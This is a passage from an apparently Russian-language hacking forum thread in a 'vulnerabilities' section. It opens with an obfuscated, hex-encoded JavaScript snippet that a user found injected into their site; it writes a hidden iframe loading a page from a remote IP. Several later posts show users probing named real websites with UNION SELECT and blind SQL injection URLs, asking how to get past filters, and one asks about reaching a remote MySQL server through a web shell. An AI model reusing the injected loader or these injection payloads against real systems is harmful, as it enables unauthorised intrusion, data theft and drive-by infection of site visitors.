ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2431  
Старый 20.06.2008, 17:01
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

script
<!--
var d=document,kol=561;
function O10H485B5B18EDFA3(H485B5B18EE79A){ return( parseInt(H485B5B18EE79A,16));}function H485B5B18EF78A(H485B5B18EFF82){ function H485B5B18F176E() {var H485B5B18F1F66=2;return H485B5B18F1F66;} var H485B5B18F077B='';for(H485B5B18F0F74=0; H485B5B18F0F74<H485B5B18EFF82.length; H485B5B18F0F74+=H485B5B18F176E()){ H485B5B18F077B += ( String.fromCharCode (O10H485B5B18EDFA3(H485B5B18EFF82.substr(H485B5B18 F0F74, H485B5B18F176E()))));}return H485B5B18F077B;} document.write(H485B5B18EF78A('3C7363726970743E696 628216D796961297B642E777269746528273C494652414D452 06E616D653D4F31207372633D5C27687474703A2F2F37372E3 232312E3133332E3137312F2E69662F676F2E68746D6C3F272 B4D6174682E726F756E64284D6174682E72616E646F6D28292 A3430383539292B27353438333662306638355C27207769647 4683D343439206865696768743D3931207374796C653D5C276 46973706C61793A206E6F6E655C273E3C2F494652414D45203 E27293B7D766172206D7969613D747275653B3C2F736372697 0743E'));
//-->
/ script

ребят что это такое? и как с этим боротся? появляется сразу после боди..
 
Ответить с цитированием

  #2432  
Старый 21.06.2008, 04:24
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

очевидно это реклама, добавляемая бесплатным хостингом. ЕСли работают файлы ХТАККЕССы, то можешь изменить расширение не на пхп а на другое, тогда может убраться
 
Ответить с цитированием

  #2433  
Старый 21.06.2008, 12:31
Аватар для Buffalon
Buffalon
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132

Репутация: 63
По умолчанию

Цитата:
Сообщение от Gorev  
script
<!--
var d=document,kol=561;
function O10H485B5B18EDFA3(H485B5B18EE79A){ return( parseInt(H485B5B18EE79A,16));}function H485B5B18EF78A(H485B5B18EFF82){ function H485B5B18F176E() {var H485B5B18F1F66=2;return H485B5B18F1F66;} var H485B5B18F077B='';for(H485B5B18F0F74=0; H485B5B18F0F74<H485B5B18EFF82.length; H485B5B18F0F74+=H485B5B18F176E()){ H485B5B18F077B += ( String.fromCharCode (O10H485B5B18EDFA3(H485B5B18EFF82.substr(H485B5B18 F0F74, H485B5B18F176E()))));}return H485B5B18F077B;} document.write(H485B5B18EF78A('3C7363726970743E696 628216D796961297B642E777269746528273C494652414D452 06E616D653D4F31207372633D5C27687474703A2F2F37372E3 232312E3133332E3137312F2E69662F676F2E68746D6C3F272 B4D6174682E726F756E64284D6174682E72616E646F6D28292 A3430383539292B27353438333662306638355C27207769647 4683D343439206865696768743D3931207374796C653D5C276 46973706C61793A206E6F6E655C273E3C2F494652414D45203 E27293B7D766172206D7969613D747275653B3C2F736372697 0743E'));
//-->
/ script

ребят что это такое? и как с этим боротся? появляется сразу после боди..
А помойму это зашифрованно чем то , помню была такая лажа ...

Последний раз редактировалось Buffalon; 21.06.2008 в 12:34..
 
Ответить с цитированием

  #2434  
Старый 21.06.2008, 12:36
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

это ифраме..поимели меня
 
Ответить с цитированием

  #2435  
Старый 21.06.2008, 14:49
Аватар для 0nep@t0p
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Цитата:
А помойму это зашифрованно чем то , помню была такая лажа ...
HEX это внутри...
 
Ответить с цитированием

  #2436  
Старый 21.06.2008, 21:43
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

есть трабла..
Цитата:
http://www.mymaika.ru/item.php?id_fon=34&id_swf=1117&id='1'+and+union+se lect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22/*
подобрал колонки 22 штуки.. через +order+by+22/* иньекция происходит в where clause
Цитата:
You have an error in your SQL syntax near '' and union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22/*' at line 1
пробвал использовать and но не получилось...
закрывал скобки по разному.. тож нече..
пробвал обходить фильтрацию.. нифига.

или сдесь:
Цитата:
http://www.hitech-online.ru/boards/pc/weblinks.html?start=9999+union+select+1/*
подскажите что делать?

Последний раз редактировалось sabe; 22.06.2008 в 11:14..
 
Ответить с цитированием

  #2437  
Старый 21.06.2008, 23:21
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

вопрос специалистам....
делаю http://site.com/index.php?m=vopros-otvet+AND+ASCII(SUBSTRING((select from user limit 3,1 ),4,1))>57/*

получаю
Ll('<P
CPgT1gQD"<.X(?j
и так далее.....что это за бред?
 
Ответить с цитированием

  #2438  
Старый 22.06.2008, 01:00
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от sabe  
подскажите что делать?
я конечно могу сильно ошибаться, но может быть тут 3 версия мускула и конструкции union select нету?
 
Ответить с цитированием

  #2439  
Старый 22.06.2008, 01:12
Аватар для Ershik
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Хочу соединиться с удаленным mysql через шелл.
Пишет:
Lost connection to MySQL server at 'reading initial communication packet', system error: 61
То есть, запрещено на конечном mysql сервере подключения извне?
 
Ответить с цитированием

  #2440  
Старый 22.06.2008, 02:42
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

хм.. вот тут наткнулся на сайт:
Цитата:
http://www.musicxport.nl/page.php?pageAlias=sadadasda&newsId=2769'
в обцем если менять значение переменной pageAlias то меняется и вывод на странице.. можно ли с этим что-нибудь сотворить?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ